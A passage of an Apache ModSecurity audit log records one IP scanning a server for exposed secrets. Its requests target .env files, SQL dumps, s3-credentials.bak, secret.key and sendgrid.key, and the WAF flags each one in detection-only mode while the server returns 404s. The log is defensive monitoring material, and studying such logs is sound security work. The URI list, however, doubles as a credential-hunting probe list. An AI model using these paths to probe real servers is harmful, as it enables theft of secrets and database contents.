"pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/pg_dump.sql"] [unique_id "aFCsHAJ4p5Cdblnjra54HwAAAAI"] Stopwatch: 1750117404266438 3260 (- - -) Stopwatch2: 1750117404266438 3260; combined=2032, p1=327, p2=1606, p3=20, p4=26, p5=53, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c5845024-Z-- --10de260e-A-- [17/Jun/2025:05:13:24.711378 +0530] aFCsHNyZ4SMykfn97vy3sgAAAAs 185.177.72.204 33246 127.0.0.1 7080 --10de260e-B-- GET /portal/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --10de260e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --10de260e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/portal/.env"] [unique_id "aFCsHNyZ4SMykfn97vy3sgAAAAs"] Stopwatch: 1750117404708061 3360 (- - -) Stopwatch2: 1750117404708061 3360; combined=2053, p1=447, p2=1503, p3=23, p4=27, p5=53, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --10de260e-Z-- --1b4e9917-A-- [17/Jun/2025:05:13:24.821717 +0530] aFCsHJVkCcfT-Z8NQYzFKQAAAAc 185.177.72.204 33254 127.0.0.1 7080 --1b4e9917-B-- GET /private/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1b4e9917-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b4e9917-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/private/.env"] [unique_id "aFCsHJVkCcfT-Z8NQYzFKQAAAAc"] Stopwatch: 1750117404818531 3230 (- - -) Stopwatch2: 1750117404818531 3230; combined=1964, p1=426, p2=1442, p3=20, p4=25, p5=51, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1b4e9917-Z-- --92acee65-A-- [17/Jun/2025:05:13:25.262932 +0530] aFCsHYoVQnPDyHnl9oPT6AAAAAY 185.177.72.204 33302 127.0.0.1 7080 --92acee65-B-- GET /prod/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --92acee65-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --92acee65-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/prod/.env"] [unique_id "aFCsHYoVQnPDyHnl9oPT6AAAAAY"] Stopwatch: 1750117405259773 3204 (- - -) Stopwatch2: 1750117405259773 3204; combined=1867, p1=402, p2=1365, p3=21, p4=26, p5=53, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --92acee65-Z-- --fc176a37-A-- [17/Jun/2025:05:13:25.704176 +0530] aFCsHQGFf516NUzzD0B3jAAAAAg 185.177.72.204 33326 127.0.0.1 7080 --fc176a37-B-- GET /public/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --fc176a37-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc176a37-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/public/.env"] [unique_id "aFCsHQGFf516NUzzD0B3jAAAAAg"] Stopwatch: 1750117405701887 2338 (- - -) Stopwatch2: 1750117405701887 2338; combined=1470, p1=312, p2=1064, p3=14, p4=19, p5=61, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fc176a37-Z-- --4a2e1b39-A-- [17/Jun/2025:05:13:26.364958 +0530] aFCsHpVkCcfT-Z8NQYzFLQAAAAc 185.177.72.204 33386 127.0.0.1 7080 --4a2e1b39-B-- GET /public/db.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4a2e1b39-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a2e1b39-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/public/db.sql"] [unique_id "aFCsHpVkCcfT-Z8NQYzFLQAAAAc"] Stopwatch: 1750117406361772 3230 (- - -) Stopwatch2: 1750117406361772 3230; combined=2013, p1=364, p2=1548, p3=21, p4=27, p5=53, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4a2e1b39-Z-- --3f498b71-A-- [17/Jun/2025:05:13:26.474886 +0530] aFCsHgGFf516NUzzD0B3jgAAAAg 185.177.72.204 33392 127.0.0.1 7080 --3f498b71-B-- GET /public/db_dump.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3f498b71-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f498b71-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/public/db_dump.sql"] [unique_id "aFCsHgGFf516NUzzD0B3jgAAAAg"] Stopwatch: 1750117406472024 2903 (- - -) Stopwatch2: 1750117406472024 2903; combined=1751, p1=363, p2=1294, p3=19, p4=24, p5=51, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3f498b71-Z-- --7f09d761-A-- [17/Jun/2025:05:13:27.691525 +0530] aFCsH9yZ4SMykfn97vy3uQAAAAs 185.177.72.204 33514 127.0.0.1 7080 --7f09d761-B-- GET /resources/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --7f09d761-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f09d761-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/resources/.env"] [unique_id "aFCsH9yZ4SMykfn97vy3uQAAAAs"] Stopwatch: 1750117407688812 2765 (- - -) Stopwatch2: 1750117407688812 2765; combined=1620, p1=366, p2=1164, p3=18, p4=23, p5=49, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7f09d761-Z-- --fa75055e-A-- [17/Jun/2025:05:13:28.244338 +0530] aFCsIArsPejRtmHkrKLgxwAAAAE 185.177.72.204 33572 127.0.0.1 7080 --fa75055e-B-- GET /s3-credentials.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --fa75055e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa75055e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/s3-credentials.bak"] [unique_id "aFCsIArsPejRtmHkrKLgxwAAAAE"] Stopwatch: 1750117408240380 4018 (- - -) Stopwatch2: 1750117408240380 4018; combined=2495, p1=448, p2=1901, p3=28, p4=36, p5=82, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fa75055e-Z-- --3f68b86d-A-- [17/Jun/2025:05:13:29.018132 +0530] aFCsIVCTF37l_jAzt4oTLgAAAAU 185.177.72.204 33638 127.0.0.1 7080 --3f68b86d-B-- GET /s3/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3f68b86d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f68b86d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/s3/.env"] [unique_id "aFCsIVCTF37l_jAzt4oTLgAAAAU"] Stopwatch: 1750117409014593 3615 (- - -) Stopwatch2: 1750117409014593 3615; combined=2181, p1=466, p2=1603, p3=22, p4=27, p5=63, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3f68b86d-Z-- --1597dc3c-A-- [17/Jun/2025:05:13:29.128453 +0530] aFCsIQJ4p5Cdblnjra54JwAAAAI 185.177.72.204 33642 127.0.0.1 7080 --1597dc3c-B-- GET /s3/.env.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1597dc3c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --1597dc3c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/s3/.env.bak"] [unique_id "aFCsIQJ4p5Cdblnjra54JwAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/s3/.env.bak"] [unique_id "aFCsIQJ4p5Cdblnjra54JwAAAAI"] Stopwatch: 1750117409125371 3124 (- - -) Stopwatch2: 1750117409125371 3124; combined=1930, p1=387, p2=1431, p3=19, p4=25, p5=67, sr=107, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1597dc3c-Z-- --b87e3057-A-- [17/Jun/2025:05:13:30.567024 +0530] aFCsIlJfblPUQiSn5r2R3AAAAAA 185.177.72.204 47142 127.0.0.1 7080 --b87e3057-B-- GET /secret/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b87e3057-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --b87e3057-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/secret/.env"] [unique_id "aFCsIlJfblPUQiSn5r2R3AAAAAA"] Stopwatch: 1750117410563572 3504 (- - -) Stopwatch2: 1750117410563572 3504; combined=2065, p1=444, p2=1506, p3=23, p4=27, p5=65, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b87e3057-Z-- --28206e56-A-- [17/Jun/2025:05:13:30.788059 +0530] aFCsIpVkCcfT-Z8NQYzFNgAAAAc 185.177.72.204 47162 127.0.0.1 7080 --28206e56-B-- GET /secrets/secret.key HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --28206e56-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --28206e56-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/secrets/secret.key"] [unique_id "aFCsIpVkCcfT-Z8NQYzFNgAAAAc"] Stopwatch: 1750117410785237 2874 (- - -) Stopwatch2: 1750117410785237 2874; combined=1702, p1=333, p2=1274, p3=18, p4=23, p5=54, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --28206e56-Z-- --8c294a54-A-- [17/Jun/2025:05:13:31.340166 +0530] aFCsI5WbMc1Q3J_M-mhI7AAAAAo 185.177.72.204 47202 127.0.0.1 7080 --8c294a54-B-- GET /sendgrid.key HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8c294a54-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c294a54-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/sendgrid.key"] [unique_id "aFCsI5WbMc1Q3J_M-mhI7AAAAAo"] Stopwatch: 1750117411336815 3406 (- - -) Stopwatch2: 1750117411336815 3406; combined=2008, p1=387, p2=1517, p3=22, p4=27, p5=55, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8c294a54-Z-- --1b9c2a14-A-- [17/Jun/2025:05:13:32.112551 +0530] aFCsJJWbMc1Q3J_M-mhI7QAAAAo 185.177.72.204 47266 127.0.0.1 7080 --1b9c2a14-B-- GET /server/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1b9c2a14-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b9c2a14-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/server/.env"] [unique_id "aFCsJJWbMc1Q3J_M-mhI7QAAAAo"] Stopwatch: 1750117412108968 3639 (- - -) Stopwatch2: 1750117412108968 3639; combined=2170, p1=491, p2=1556, p3=24, p4=32, p5=67, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1b9c2a14-Z-- --0d749a14-A-- [17/Jun/2025:05:13:34.321628 +0530] aFCsJmMOUduHrxpwbslYjwAAAAM 185.177.72.204 47446 127.0.0.1 7080 --0d749a14-B-- GET /site.conf HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0d749a14-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d749a14-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/site.conf"] [unique_id "aFCsJmMOUduHrxpwbslYjwAAAAM"] Stopwatch: 1750117414318435 3236 (- - -) Stopwatch2: 1750117414318435 3236; combined=1943, p1=343, p2=1505, p3=20, p4=25, p5=50, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0d749a14-Z-- --dd263f3d-A-- [17/Jun/2025:05:13:34.431971 +0530] aFCsJtyZ4SMykfn97vy3wgAAAAs 185.177.72.204 47448 127.0.0.1 7080 --dd263f3d-B-- GET /site.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --dd263f3d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd263f3d-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/site.sql"] [unique_id "aFCsJtyZ4SMykfn97vy3wgAAAAs"] Stopwatch: 1750117414428926 3088 (- - -) Stopwatch2: 1750117414428926 3088; combined=1889, p1=353, p2=1439, p3=21, p4=24, p5=52, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dd263f3d-Z-- --83453c1f-A-- [17/Jun/2025:05:13:34.653037 +0530] aFCsJpVkCcfT-Z8NQYzFOQAAAAc 185.177.72.204 47464 127.0.0.1 7080 --83453c1f-B-- GET /site/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip 